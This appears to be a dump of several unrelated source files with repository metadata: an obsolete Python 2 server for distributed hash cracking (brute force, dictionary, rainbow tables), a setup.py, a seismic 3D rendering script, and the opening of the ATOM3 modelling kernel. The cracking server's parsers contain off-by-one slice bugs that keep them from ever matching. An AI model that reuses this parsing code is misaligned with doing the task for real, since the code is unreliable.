print "ERROR: An exception was thrown in the Server-Client Inbound checkForFoundSolutionCommand Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#..............................................................................
#CRASHED
#..............................................................................
def checkForCrashedCommand(self,inboundString): #checks for the "CRASHED" Command
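#expected wire format: "CRASHED <crashed client IP>", e.g. "CRASHED 10.0.0.7"
#(the address shown is only illustrative); position 7 is a space, so the IP
#is read from position 8 onwards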
try:
if(len(inboundString) < 1):
print "INFO: Empty Crashed Message Received."
return False
if(inboundString[0]=="C"):
if(inboundString[1]=="R"):
if(inboundString[2]=="A"):
if(inboundString[3]=="S"):
if(inboundString[4]=="H"):
if(inboundString[5]=="E"):
if(inboundString[6]=="D"):
tempCrashIP = ""
#position 7 is a space between the ip address and the crashed message
for i in range(8, len(inboundString)):
if(inboundString[i].isalpha()):
print "WARNING: A Non-Numeral Value Was Detected In The Ip Address, Ignoring Remainder of String"
break
else:
tempCrashIP = tempCrashIP + inboundString[i]
if(len(tempCrashIP) < 1): #if the length is less than one, stop performing an IP check
return False
print "WARNING: A Client has issued the CRASHED command"
print "The Crashed Client IP: " + tempCrashIP
self.listOfCrashedClients.append(tempCrashIP)
print "INFO: The crashed client's IP address has been added to the listOfCrashedClients"
#look through listOfConnected clients and find the matching ip address
print "STATUS: Looking for matching IP address in list of clients..."
foundMatch= False
tempAddr2= ""
for index in range(0, len(self.listOfClients)):
tempSock, tempAddr= self.listOfClients[index] #get socket and ip address of client
print "STATUS: Copying list of clients' IP Address to a new string"
tempAddr2= str(tempAddr[0])
print "STATUS: Comparing IP Addresses..."
if(tempCrashIP == tempAddr2):
print "INFO: Matching IP address was found in the list of clients"
#print "DEBUG: tempAddr=" + str(tempAddr)
del self.listOfClients[index]
print "INFO: The crashed client " + str(tempAddr) + " was removed from the list of clients"
foundMatch= True
self.recordOfInboundCommandsFromClientToServer['CRASHED'] = (self.recordOfInboundCommandsFromClientToServer['CRASHED'] + 1)
break
else:
print "INFO: No Match found yet. " + str(tempCrashIP) + " != " + str(tempAddr2)
if(foundMatch == False):
print "WARNING: No Matching IP address was found in the list of clients"
print "INFO: Unable to Find the Crashed IP: " +str(tempCrashIP) + " "
return True
else:
return False
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the Server-Client Inbound checkForCrashedCommand Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
#==================================================================================================
#CHUNK PARSING FUNCTIONS (THESE FUNCTIONS ARE ALL OBSOLETE)
#==================================================================================================
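#Taken together, these parsers imply that a chunk params string was consumed
#token-by-token in this order: method, algorithm, hash code, alphabet choice,
#minCharacters, maxCharacters, prefix, file location, width, height.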
#-------------------------------------------------------------------------------------------------
#Determine the method being used (bruteforce,dictionary,rainbowmaker,rainbowuser)
#-------------------------------------------------------------------------------------------------
#check for bruteforce
def checkForBruteForceMethod(self,inboundString):
if(inboundString[0:9] == "bruteforce"):
print "Chunk Method: bruteforce"
return True
else:
return False
#check for dictionary
def checkForDictionaryMethod(self,inboundString):
if(inboundString[0:9] == "dictionary"):
print "Chunk Method: dictionary"
return True
else:
return False
#check for rainbowmaker
def checkForRainbowMakerMethod(self,inboundString):
if(inboundString[0:12] == "rainbowmaker"):
print "Chunk Method: rainbowmaker"
return True
else:
return False
#check for rainbowuser
def checkForRainbowUserMethod(self,inboundString):
if(inboundString[0:11] == "rainbowuser"):
print "Chunk Method: rainbowuser"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the algorithm being used (md5,sha1,sha256,sha512)
#-------------------------------------------------------------------------------------------------
#check for md5
def checkForMD5Algorithm(self,inboundString):
if(inboundString[0:2] == "md5"):
print "Chunk Algorithm: md5"
return True
else:
return False
#check for sha1
def checkForSHA1Algorithm(self,inboundString):
if(inboundString[0:3] == "sha1"):
print "Chunk Algorithm: sha1"
return True
else:
return False
#check for sha256
def checkForSHA256Algorithm(self,inboundString):
if(inboundString[0:5] == "sha256"):
print "Chunk Algorithm: sha256"
return True
else:
return False
#check for sha512
def checkForSHA512Algorithm(self,inboundString):
if(inboundString[0:5] == "sha512"):
print "Chunk Algorithm: sha512"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Obtain the hash code
#-------------------------------------------------------------------------------------------------
#No function needed for this
#-------------------------------------------------------------------------------------------------
#Determine the Alphabet Choice (a,A,m,M,d)
#-------------------------------------------------------------------------------------------------
#check for a
def checkForLowerCaseAlphabet(self,inboundString):
if(inboundString[0] == "a"):
print "Chunk Alphabet: a"
return True
else:
return False
#check for A
def checkForUpperCaseAlphabet(self,inboundString):
if(inboundString[0] == "A"):
print "Chunk Alphabet: A"
return True
else:
return False
#check for m
def checkForLowerCaseAlphaNumeric(self,inboundString):
if(inboundString[0] == "m"):
print "Chunk AlphaNumeric: m"
return True
else:
return False
#check for M
def checkForUpperCaseAlphaNumeric(self,inboundString):
if(inboundString[0] == "M"):
print "Chunk AlphaNumeric: M"
return True
else:
return False
#check for d
def checkForDigitsAlphabet(self,inboundString):
if(inboundString[0] == "d"):
print "Chunk Alphabet: d"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the minCharacters (1,10,16)
#-------------------------------------------------------------------------------------------------
#check for 1
def checkForMinCharacter1(self,inboundString):
if(inboundString[0] == "1"):
print "Chunk minCharacter: 1"
return True
else:
return False
#check for 10
def checkForMinCharacter10(self,inboundString):
if(inboundString[0:1] == "10"):
print "Chunk minCharacter: 10"
return True
else:
return False
#check for 16
def checkForMinCharacter16(self,inboundString):
if(inboundString[0:1] == "16"):
print "Chunk minCharacter: 16"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the maxCharacters (1,10,16)
#-------------------------------------------------------------------------------------------------
#check for 1
def checkForMaxCharacter1(self,inboundString):
if(inboundString[0] == "1"):
print "Chunk maxCharacter: 1"
return True
else:
return False
#check for 10
def checkForMaxCharacter10(self,inboundString):
if(inboundString[0:1] == "10"):
print "Chunk maxCharacter: 10"
return True
else:
return False
#check for 16
def checkForMaxCharacter16(self,inboundString):
if(inboundString[0:1] == "16"):
print "Chunk maxCharacter: 16"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the Prefix (adf,234,qw3#k)
#-------------------------------------------------------------------------------------------------
#check for adf
def checkForADFPrefix(self,inboundString):
if(inboundString[0:3] == "adf"):
print "Chunk Prefix: adf"
return True
else:
return False
#check for 234
def checkFor234Prefix(self,inboundString):
if(inboundString[0:2] == "234"):
print "Chunk Prefix: 234"
return True
else:
return False
#check for qw3#k
def checkForQW3Prefix(self,inboundString):
if(inboundString[0:4] == "qw3#k"):
print "Chunk Prefix: qw3#k"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the File Location (0,1213,23665)
#-------------------------------------------------------------------------------------------------
#check for 0
def checkForFileLocation0(self,inboundString):
if(inboundString[0] == "0"):
print "Chunk File Location: 0"
return True
else:
return False
#check for 1213
def checkForFileLocation1213(self,inboundString):
if(inboundString[0:3] == "1213"):
print "Chunk File Location: 1213"
return True
else:
return False
#check for 23665
def checkForFileLocation23665(self,inboundString):
if(inboundString[0:4] == "23665"):
print "Chunk File Location: 23665"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the Width (1,100,100000)
#-------------------------------------------------------------------------------------------------
#check for 1
def checkForWidth1(self,inboundString):
if(inboundString[0] == "1"):
print "Chunk Width: 1"
return True
else:
return False
#check for 100
def checkForWidth100(self,inboundString):
if(inboundString[0:2] == "100"):
print "Chunk Width: 100"
return True
else:
return False
#check for 100000
def checkForWidth100000(self,inboundString):
if(inboundString[0:5] == "100000"):
print "Chunk Width: 100000"
return True
else:
return False
#-------------------------------------------------------------------------------------------------
#Determine the Height (1,100,10000)
#-------------------------------------------------------------------------------------------------
#check for 1
def checkForHeight1(self,inboundString):
if(inboundString[0] == "1"):
print "Chunk Height: 1"
return True
else:
return False
#check for 100
def checkForHeight100(self,inboundString):
if(inboundString[0:2] == "100"):
print "Chunk Height: 100"
return True
else:
return False
#check for 10000
def checkForHeight10000(self,inboundString):
if(inboundString[0:5] == "10000"):
print "Chunk Height: 10000"
return True
else:
return False
#=============================================
#Find the socket that matches the IP address
#=============================================
def findClientSocket(self,clientIPAddress):
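#linear search of listOfClients for the client whose address matches the given
#IP; returns the matching (socket, address) tuple, or None when nothing matches
#(callers that unpack the result directly must guard against the None case)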
try:
foundMatch= False
for x in range(0, len(self.listOfClients)):
tempSock, tempAddr = self.listOfClients[x]
if(clientIPAddress == tempAddr[0]):
print "INFO: Found client's corresponding socket"
foundMatch= True
return (tempSock,tempAddr)
else:
print "INFO: No corresponding socket found yet. " + str(clientIPAddress) + "!=" + str(tempAddr[0])
if(foundMatch == False):
print "WARNING: No corresponding socket was found to match the IP: " + str(clientIPAddress)
return None
except Exception as inst:
print "============================================================================================="
print "ERROR: An exception was thrown in the findClientSocket Try Block"
#the exception instance
print type(inst)
#arguments stored in .args
print inst.args
#__str__ allows args to be printed directly
print inst
print "============================================================================================="
|
COCS4950G7/COSC4950
|
Source/Network/Obsolete/NetworkServer_r9E.py
|
Python
|
gpl-3.0
| 90,551
|
[
"ADF"
] |
8d6e131289202630223e045070d5867df2ed8ceafa7054fb7012c6fe98f65303
|
#!/usr/bin/env python
# coding=utf-8
import sys
try:
from setuptools import setup
except ImportError:
sys.stderr.write('using distutils\n')
from distutils.core import setup
with open('requirements.txt') as f:
required = f.read().splitlines()
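# pip-style VCS requirement lines ("...#egg=<name>") are reduced to the bare
# package name so that setuptools' install_requires accepts them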
required = [ req.split('#egg=')[1] if '#' in req else req for req in required ]
setup(
name='amber-python-drivers',
packages=[
'amberdriver',
'amberdriver.common',
'amberdriver.dummy',
'amberdriver.hokuyo',
'amberdriver.drive_to_point',
'amberdriver.drive_support',
'amberdriver.null',
'amberdriver.roboclaw',
'amberdriver.tools',
'amberdriver.tests'
],
package_dir={
'amberdriver': 'src/amberdriver',
'amberdriver.common': 'src/amberdriver/common',
'amberdriver.dummy': 'src/amberdriver/dummy',
'amberdriver.hokuyo': 'src/amberdriver/hokuyo',
'amberdriver.drive_to_point': 'src/amberdriver/drive_to_point',
'amberdriver.drive_support': 'src/amberdriver/drive_support',
'amberdriver.null': 'src/amberdriver/null',
'amberdriver.roboclaw': 'src/amberdriver/roboclaw',
'amberdriver.tools': 'src/amberdriver/tools',
'amberdriver.tests': 'src/amberdriver/tests'
},
package_data={'': [
'src/amberdriver/common/amber.ini',
'src/amberdriver/dummy/dummy.ini',
'src/amberdriver/hokuyo/hokuyo.ini',
'src/amberdriver/drive_to_point/drive_to_point.ini',
'src/amberdriver/drive_support/drive_support.ini',
'src/amberdriver/roboclaw/roboclaw.ini',
'src/amberdriver/tools/main.ini'
]},
data_files=[
('', [
'src/amberdriver/common/amber.ini',
'src/amberdriver/dummy/dummy.ini',
'src/amberdriver/hokuyo/hokuyo.ini',
'src/amberdriver/drive_to_point/drive_to_point.ini',
'src/amberdriver/drive_support/drive_support.ini',
'src/amberdriver/roboclaw/roboclaw.ini',
'src/amberdriver/tools/main.ini'
]),
],
test_suite="amberdriver.tests",
include_package_data=True,
install_requires=required,
version='1.19',
description='Amber drivers in python',
author=u'Paweł Suder',
author_email='pawel@suder.info',
url='http://project-capo.github.io/',
download_url='http://github.com/project-capo/amber-python-drivers/',
keywords=[
'amber',
'dummy',
'hokuyo',
'drive to point',
'drive support',
'roboclaw',
'panda'
],
classifiers=[
'Programming Language :: Python',
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: Other/Proprietary License',
'Operating System :: OS Independent',
],
long_description='''\
'''
)
|
project-capo/amber-python-drivers
|
setup.py
|
Python
|
mit
| 2,925
|
[
"Amber"
] |
9e92427f76d9d504beccc6b60836c17759792aa08f6cb44fe462b8c212bf3f6c
|
import tempfile
from mayavi import mlab
import Image
import numpy as np
import geoprobe
import scipy.ndimage
import matplotlib.colors as mcolors
import matplotlib.cm as cm
import utils
def main():
vol, top = load_data()
downsample = 3
fig = mlab.figure(bgcolor=(1,1,1))
x, y, z = hor2xyz(top, vol, downsample)
build_sides(vol, x, y, z, vol.nz)
# Build top
seafloor = top_texture(top, vol)
top_mesh = mlab.mesh(x, y, z)
texture(top_mesh, np.flipud(seafloor.T), cm.gray)
build_base(x, y, z, vol)
utils.present(fig)
def load_data():
top = geoprobe.horizon('data/seismic/Horizons/channels.hzn')
vol = geoprobe.volume('data/seismic/Volumes/example.vol')
vol.data = vol.load()
top = smooth_horizon(top)
return vol, top
def build_base(x, y, z, vol, wall_thick=5):
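# appears to build the model's underside: a copy of the horizon shifted down by
# wall_thick across the interior, dropping to the bottom of the volume along a
# wall_thick-wide rim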
z0 = -vol.nz * np.ones_like(z)
sl = np.s_[wall_thick:-wall_thick, wall_thick:-wall_thick]
z0[sl] = z[sl] - wall_thick
return mlab.mesh(x, y, z0, color=(1, 1, 1))
def build_sides(vol, x, y, z, base, zbase=None):
for axis in [0, 1]:
for val in [0, -1]:
slices = [slice(None), slice(None), slice(None, base)]
slices[axis] = val
slices = tuple(slices)
build_side(vol, slices, x, y, z, zbase)
def build_side(vol, sl, x, y, z, zbase=None):
data = vol.data
full = sl
sl = sl[:2]
z0, x0, y0 = z[sl], x[sl], y[sl]
if zbase is None:
base = -np.arange(data.shape[2])[full[-1]].max()
base = base * np.ones_like(z0)
else:
base = zbase[sl]
z0 = np.vstack([z0, base])
x0 = np.vstack([x0, x0])
y0 = np.vstack([y0, y0])
mesh = mlab.mesh(x0, y0, z0)
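    # z holds negated volume indices (see hor2xyz), so -z0 recovers the
    # positive sample range this wall spans along the volume's z axis.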
sl = slice(-z0.max(), -z0.min(), full[-1].step)
full = tuple([full[0], full[1], sl])
dat = data[full].T
cmap = geoprobe.colormap('data/seismic/Colormaps/brown_black').as_matplotlib
texture(mesh, dat, cmap)
return mesh
def hor2xyz(hor, vol, downsample=1):
z = hor.grid
z = vol.model2index(z, axis='z', int_conversion=False)
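    # model2index returns positive sample indices; negating them makes depth
    # plot downward in the scene, and the transpose matches the (row, column)
    # layout used by mgrid below.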
z = -z.T
ds = downsample
y, x = np.mgrid[:z.shape[0], :z.shape[1]]
x,y,z = x[::ds, ::ds], y[::ds, ::ds], z[::ds, ::ds]
return x, y, z
def top_texture(hor, vol):
"""RMS Amplitude Extraction on Bottom Horizon."""
chan = geoprobe.utilities.extractWindow(hor, vol, 0, 4)
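    # The amplitudes appear to be 8-bit values centered on 128; subtracting
    # 128 recenters them on zero, and the square/mean/sqrt sequence below is
    # the RMS amplitude over the extraction window.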
chan = (chan.astype(float) - 128.0)**2
chan = np.sqrt(chan.mean(axis=-1))
return chan
def texture(mesh, data, cmap, vmin=None, vmax=None):
if vmin is None:
vmin = data.min()
if vmax is None:
vmax = data.max()
dat = scipy.ndimage.zoom(data, 3)
norm = mcolors.Normalize(vmin, vmax)
rgba = cmap(norm(dat))
rgba = (255 * rgba).astype(np.uint8)
im = Image.fromarray(rgba).convert('RGB')
# Evil, ugly hack. Still don't understand why RGB texturing isn't working
# correctly without bringing in an image. Fix later!
_, fname = tempfile.mkstemp()
    with open(fname, 'wb') as f:
im.save(f, 'PNG')
utils.texture(mesh, fname=fname)
def smooth_horizon(hor):
z = hor.grid
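    # The median filter suppresses isolated spikes in the picked horizon;
    # the gaussian pass then smooths the remaining surface.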
z = scipy.ndimage.median_filter(z.astype(float), 4)
z = scipy.ndimage.gaussian_filter(z, 1.5)
xmin, xmax, ymin, ymax = hor.grid_extents
y, x = np.mgrid[ymin:ymax+1, xmin:xmax+1]
return geoprobe.horizon(x.flatten(), y.flatten(), z.flatten())
if __name__ == '__main__':
    main()
| joferkington/scipy2015-3d_printing | make_base.py | Python | mit | 3,380 | ["Mayavi"] | 49aa995f949fb04eddf7a84e8fe8454e40a7296a62b441692cb4a879fc6e75f1 |
# __ File: ATOM3.py __________________________________________________________________________________________________
#
# Implements : class ATOM3
# Author : Juan de Lara and Denis Dube
# Description : This is the ATOM3 kernel.
# Modified : 26 Feb, 2005
# Changes :
# About halfway through this file, where there's a lot of dashes, the
# code is from Juan de Lara without modification. The rest is new/modified
# by Denis Dube between Summer 2004 and Winter 2005
# Note: This isn't 100% true, I've somehow managed to modify stuff everywhere...
# ____________________________________________________________________________________________________________________
PRINT_TIME_INFO = True
#if( PRINT_TIME_INFO ): print "\nStarting AToM3\n"
import time
t = time.time()
# Python code imports
import sys
import os
import tkFileDialog
import string
import Dialog
import re
import distutils.file_util
import threading
from Tkinter import *
# Path setting
try:
from FilePaths import getCriticalPaths
except:
sys.exit(1)
CRITICAL_PATHS = getCriticalPaths()
if( PRINT_TIME_INFO ):
print "Python code imports & path setting completed in: %.3f seconds" % ( time.time() - t )
t = time.time()
from ASGNode import *
from ASG import *
from ATOM3TypeDialog import *
from ATOM3List import *
from ATOM3TypeInfo import *
from GGrule import *
from GraphGrammarEdit import *
from GraphRewritingSys import *
from StatusBar import *
from Console import *
from DebugConsole import *
from GrammarExecution import *
#from TypeCodeGen import *
from Buttons import *
#from createButtons import *
if( PRINT_TIME_INFO ):
print "ATOM3 core source code imported in: %.3f seconds" % ( time.time() - t )
t = time.time()
#--------------- Summer 2004+ imports added by Denis Dube -----------------
#from UI_StateChart import UI_StateChart
#from KeyBinds import createBindings
from NoConsole import NoConsole
from DrawConnections import drawConnections as drawConnectionsBridge
from DrawConnections import showConnection as showConnectionBridge
from CallbackState import CallbackState
from ArrowEditor import ArrowEditor
from PilotArrow import PilotArrow
from SelectionBox import SelectionBox
from StaticMenus import buildAllMenus, toggleMainToolMenu
from popupMenuCreator import PopupMenuCreator
from OptionDatabase import OptionDatabase
from OptionDialog import OptionDialog
from Undo import Undo
from Postscript import Postscript
from Utilities import selectAllVisibleObjects, optimizeConnectionPorts
from Exporter import Exporter
from Embedded_Images import Embedded_Images
from FilePaths import SOURCE_CODE_PATH, META_MODEL_PATH, MODEL_PATH
from FilePaths import OPTIONS_PATH, USER_MMODEL_PATH, USER_MODEL_PATH
from FilePaths import USER_AREA_RECREATED, USER_PATH,USER_NAME
from FilePaths import doTempFileCleanup, doTempCleanupALL
from FilePaths import doTempCleanupChoice
from Cursors import setCursor
from __init__ import BASE_PATH
from UI_Behavior_Loaders import loadKeybindsOption, loadBehaviorModelOption
from UI_Scoping import UI_Scoping
import ForceTransfer
import SnapGrid
from Qoca.constraints.QocaSolver import QocaSolver
from Qoca.constraints.QocaSolverAbstract import QocaSolverAbstract
from Qoca.client.__init__ import QOCAPATH
from Qoca.constraints.QocaConstants import SOLVER_CASS, SOLVER_EQ, SOLVER_INEQ
if( PRINT_TIME_INFO ):
print "User-interface source code imported in: %.3f seconds\n" % ( time.time() - t )
class ATOM3(Frame):
VERSION = 'v0.3'
ROOT_ATOM3_INSTANCE = None
# Constants that define the operations' mode
IDLEMODE = "IDLEMODE"
EXPANDModel = "EXPANDModel"
INSERTModel = "INSERTModel"
SELECTgraph = "SELECTgraph"
# Constants that define option keys
FULLSCREEN = 'Fullscreen'
EXTRA_CONSOLES = 'Extra Consoles'
GEN_GRAPHICS = 'Generate Graphics'
UI_BEHAVIOR_MODEL = 'UI Behavior Model'
UI_KEYBINDS = 'UI Key Bindings'
#INIT_METAMODEL = 'Initial Meta-Model'
OPEN_FORMALISMS = 'Open Formalisms'
GG_CODE_GEN = 'Graph Grammar Code Gen.'
CODE_GEN_DIR = 'Code Gen. Dir.'
STATIC_MENUBAR = 'Menubar'
SMOOTH_ARROWS = 'Smooth Arrows'
LASTOPEN_MODEL = 'Last open model'
LASTOPEN_MMODEL = 'Last open meta-model'
LAST_INITIAL_DIRS = 'Last Initial Dirs'
SOURCE_PATHS = 'Model Source Paths'
UNDO_ENABLED = 'Enable Undo'
UNDO_MODS_PER_SAVE= 'Modifications per undo'
UNDO_DEPTH = 'Undo depth'
TOOLBAR_HEIGHT = 'Toolbar height'
BUTTONS_PER_ROW = 'Buttons per row'
QOCA_OPTIONS = 'QOCA Options'
# Main Canvas Size (minimum size) & Scrollable region
MODEL_AREA = ( 300, 300 )
CANVAS_SIZE_TUPLE = (0,0,1500,1500)
# Attributes for whom we use 'fill'
fillAttributes = ['line', 'text']
# How many recent models/meta-models to keep in memory
FILE_HISTORY_DEPTH= 10
# Loaded Meta-Model String Pattern
LOADED_MM_PATTERN = re.compile( "\AloadedMMName *= *'(\w*)'" )
# Loaded Meta-Model List Pattern
LOADED_MM_LIST_PATTERN = re.compile( "\AloadedMMName *= *\[[\s\,\'\w]*\]" )
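  # Illustrative (hypothetical) lines these patterns are intended to match:
  #   loadedMMName = 'Buttons'             -> LOADED_MM_PATTERN
  #   loadedMMName = ['DFA', 'Buttons']    -> LOADED_MM_LIST_PATTERN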
def __init__(self, parent, GUIModelName=None, IsMainKernel = 0,
genGraphics = 1, ASGroot = None, editGGLabels = 0):
Frame.__init__(self, parent) # call the Frame constructor
# Makes sure that AToM3 has the focus
parent.focus_force()
# Let's make AToM3 a bit more accessible... - Denis
if(ATOM3.ROOT_ATOM3_INSTANCE == None):
ATOM3.ROOT_ATOM3_INSTANCE = self
self.parent = parent
#self.opBar = Frame(self.parent)
self.isOpBarPresent = 0
#self.grphBar = Frame(self.parent)
self.isGrphBarPresent = 0
self.numImg = -1 # Number of images loaded in the buttons. Added 27/Jul/2002.
self.buttonImage = [] # List with the images loaded. Added 27/Jul/2002.
self.GGforCodeGen = "createButtons" # Name of the graph grammar for code generation. Added 27/Jul/2002.
self.name2GGdict = {}
self.editGGLabel = editGGLabels # store if we are editing a Graph Grammar Rule
self.ASGroot = ASGroot
self.userActionsMap = {} # mapping between user actions and functions
self.types = {} # dictionary to store the types and handling functions
self.newTypes = [] # list with the newly added types
    self.IsMainKernel = IsMainKernel # Whether I'm the main Kernel Window or not.
self.option=None
self.codeGenDir = ""
self.coupledGG = None # info (object of type GraphGrammarExecution) with the graph-grammars to be executed on the model
self.console = None
self.entitiesInMetaModel = {} # dictionary with the entities defined by each meta-model.
self.GUIModelName = None # name of the GUI Model currently in use
self.metaModelName = None # name of the meta-model
self.modes = {} # dictionary in which the keys are the buttons, and the contents are the modes
self.mode = self.IDLEMODE
self.openGUI_ModelDict = dict() # *_MM classname to *_META classname mapping
self.showNamedPortMessage = True
self.setupOptionDatabase()
self.assembleToolbar()
self.isLoadingModel = False
self.inGGeditDialog = False
if self.IsMainKernel:
if not GUIModelName: # no metamodel specified, see default
#self.GUIModelName = self.optionsDatabase.get(self.INIT_METAMODEL)
if( self.openFormalismsList ): self.GUIModelName = self.openFormalismsList[0]
else: self.GUIModelName = None
else: # override the options
self.GUIModelName = GUIModelName
else:
self.GUIModelName = GUIModelName # meta model name currently in use
# Start AToM3 with full screen coverage
try:
if( self.optionsDatabase.get(self.FULLSCREEN) ):
if( sys.platform == 'win32' ): parent.wm_state('zoomed')
else: parent.geometry("%dx%d+0+0"%(1600,1200))
# Start in "Debugging" mode. Covers up the console as little as possible.
else: parent.geometry("+%d+%d"%(0,0))
except:
pass # Occurs if using AToM3 inside a Tkinter Frame instead of Toplevel window
self.openMetaModels = ATOM3List([0,0,1,0], ATOM3String) # list with the names of the open metamodels
self.metaModelFileNames = [] # list with the file names of the open metamodels
self.ConnectivityMap = {} # A dictionary to store how to connect entities.
self.CardinalityTable= {} # A table to store the cardinalities...
self.buttonList = [] # A list of buttons.
#------------------------- Canvas Panel Init --------------------------
canvasPanel= Frame(self.parent, name = "canvaspanel")#, width=800, height=500)
# Create the modelling zone, width=700, height=500,
self.UMLmodel = Canvas(canvasPanel, name = "modelcanvas",
borderwidth=5, scrollregion=self.CANVAS_SIZE_TUPLE,
relief=RIDGE, bg = 'white',
width=self.MODEL_AREA[0],
height=self.MODEL_AREA[1])
# scrollbars for drawarea
bottom_scrollbar = Frame(canvasPanel)
self.UMLmodel.scrollX = Scrollbar(bottom_scrollbar, orient=HORIZONTAL)
self.UMLmodel.scrollY = Scrollbar(canvasPanel, orient=VERTICAL)
# link canvas, scrollbars, and events
self.UMLmodel['xscrollcommand'] = self.UMLmodel.scrollX.set
self.UMLmodel['yscrollcommand'] = self.UMLmodel.scrollY.set
self.UMLmodel.scrollX['command'] = self.UMLmodel.xview
self.UMLmodel.scrollY['command'] = self.UMLmodel.yview
self.UMLmodel.square = Canvas(bottom_scrollbar, width=20, height=20)
self.UMLmodel.scrollX.pack(side=LEFT, fill = X, expand = 1)
self.UMLmodel.square.pack(side=RIGHT)
bottom_scrollbar.pack(side=BOTTOM, fill = X, expand = 0)
self.UMLmodel.pack(side=LEFT, fill = BOTH, expand=1)
self.UMLmodel.scrollY.pack(side=LEFT, fill = Y, expand = 0)
self.statusbar = StatusBar(parent)
# ------------------------------- Final Packing ---------------------------
#self.toolBarFrame.pack(side=TOP, fill=X, expand = 1) # Make toolbar visible
self.isConstraintBarActive = False # Afraid to remove this...
canvasPanel.pack(side=TOP, fill=BOTH, expand=1)
self.canvasPanel = canvasPanel
self.statusbar.pack(side = TOP, fill = X, expand = 0)
#------------------------ User Interface Init -------------------------
self.exporter = Exporter( self )
self.cb = CallbackState( self.UMLmodel, VisualObj.Tag2ObjMap, self.parent )
self.pilotArrow = PilotArrow( self.UMLmodel )
self.selectionBox = SelectionBox( self.UMLmodel )
self.postscriptBox = Postscript( self, self.UMLmodel )
self.arrowEditor = ArrowEditor( self.UMLmodel, self.parent )
self.undoer = Undo( self )
self.undoer.setUndoParameters( self.optionsDatabase.get(self.UNDO_ENABLED),
self.optionsDatabase.get(self.UNDO_DEPTH),
self.optionsDatabase.get(self.UNDO_MODS_PER_SAVE) )
# Should new arrows be drawn as smooth?
if( self.optionsDatabase.get(self.SMOOTH_ARROWS) ):
self.pilotArrow.toggleCreateSmooth()
# Get the snapGrid rolling...
self.snapGridInfoTuple = None
SnapGrid.applyLayout(self)
# Deploy automatic force transfer? WARNING: Uses obsolete version of FTA!
self.isAutoForceTransferEnabled = False
ForceTransfer.applyLayout( self, initilizeOnly = True )
# Warn the user if the User area (directories, options, etc. ) has been rebuilt
if( USER_AREA_RECREATED ):
tkMessageBox.showinfo(
"User Settings Folders Created",
"AToM3 has created " + str( USER_AREA_RECREATED ) + " new directories "+
"to contain user settings. The root directory of these settings is: "+
USER_PATH + "\n\nThese directories contain only option preferences and "+
"temporary files. There should not be any need to modify these files manually.",
parent=self)
# Warn the user why graphics aren't working the way they should :D
if( not self.genGraphics ):
tkMessageBox.showwarning(
"Warning: Generate Graphics Disabled!",
"You will not be able to open models with graphical attributes\n\n"+
"If this is not what you wanted, please visit the options",
parent=self)
# Creates popup menus
self.popupMenuCreator = PopupMenuCreator( self )
# Behaviour model for the user interface
# Assumes the statechart is going to need a TkInstance for timed behavior
try:
self.UI_Statechart.initModel( TkInstance=self )
except:
      print 'ERROR: You are probably trying to use a UI StateChart compiled' \
            +' with the regular threaded version of SCC. This will not work!'
raise
self.UI_Statechart.event("Start",self)
# Setup UI zones, makes it possible to use different UI charts for
# different zones of the canvas
self.UI_scope = UI_Scoping(self.UMLmodel, self.UI_Statechart)
# Loads model paths from options into sys.paths
self.sourcePathOptionLoad()
#---------------------- OPEN INITIAL META MODEL -----------------------
#print "self.GUIModelName, ASGroot = ", self.GUIModelName, ASGroot
#print "Opening MetaModel : ", self.GUIModelName
# The initial meta-model may do stuff that requires fill type info...
self.typeList = ATOM3List([1,1,1,0], ATOM3TypeInfo, self )
from defaultFillTypesInfo import defaultFillTypesInformation
defaultFillTypesInformation(self)
self.fillDictionaryWithTypes()
# Secondary AToM3 instance...
if(GUIModelName):
# Special situation: We want to open a model, not just a formalism!
if(GUIModelName[-7:].upper() == '_MDL.PY'):
self.open(GUIModelName) # GUIModelName = Full path to a model file
# Opening a formalism
else:
self.console.appendText("Initializing AToM3 with GUI: "+self.GUIModelName) # put the message in the console
if(self.GUIModelName): # if a metamodel must be loaded...
if not self.ASGroot:
self.openMetaModel(self.GUIModelName, 0, 1) # create a new ASGroot if we do not have one
else:
self.openMetaModel(self.GUIModelName, 0, 0) # do not create a new ASGroot if we have one.
# Case when AToM3 started up for the first time
else:
for formalism in self.openFormalismsList:
self.GUIModelName = formalism
if( ASGroot and
formalism == ASGroot.getGUIName( ASGroot.metaModelName )[0] ):
pass
self.console.appendText("Initializing AToM3 with GUI: "+self.GUIModelName) # put the message in the console
if(self.GUIModelName): # if a metamodel must be loaded...
if not self.ASGroot:
self.openMetaModel(self.GUIModelName, 0, 1) # create a new ASGroot if we do not have one
else:
self.openMetaModel(self.GUIModelName, 1, 0) # do not create a new ASGroot if we have one.
#------------------------- Final Initilization ------------------------
# Binds & Menus
try:
self.parent.protocol("WM_DELETE_WINDOW", self.exitFromATOM3)
except:
pass # Occurs if using AToM3 inside a Tkinter Frame instead of Toplevel window
if( not self.__dict__.has_key( 'mmtoolMenu' ) ):
buildAllMenus(self) # Creates a topLevel menu
# Parms: AToM3_instance, TK_Canvas, TK_Root_Window
self.createBindingsMethod(self, self.UMLmodel, self.parent )
if self.metaModelName: # if a metamodel must be loaded...
try:
self.typeList = ATOM3List([1,1,1,0], ATOM3TypeInfo, self )
self.fillTypesInformation(self) # fill the types list
self.fillDictionaryWithTypes() # Convert list into a dictionary
except AttributeError:
print "File "+self.metaModelName+" is not a valid meta-model... Aborting"
self.quit()
sys.exit(1)
self.fromClass = None # initial class in a connection operation
self.toClass = None # second class in a connection operation
#self.globalConstraintsDict = {} # global constraints dictionary
self.sem_objFrom = None # For connecting objects
self.sem_objTo = None # For connecting objects
self.EditingGraphGrammar = None # Graph Grammar being edited currently
self.theKeyword = None
self.inter_connect_points = [] # list of intermediate connecting points
# Not sure what this is doing! - Denis
if( self.ASGroot and not IsMainKernel ):
# open the necessary metamodels (look over the merged ASGs)!
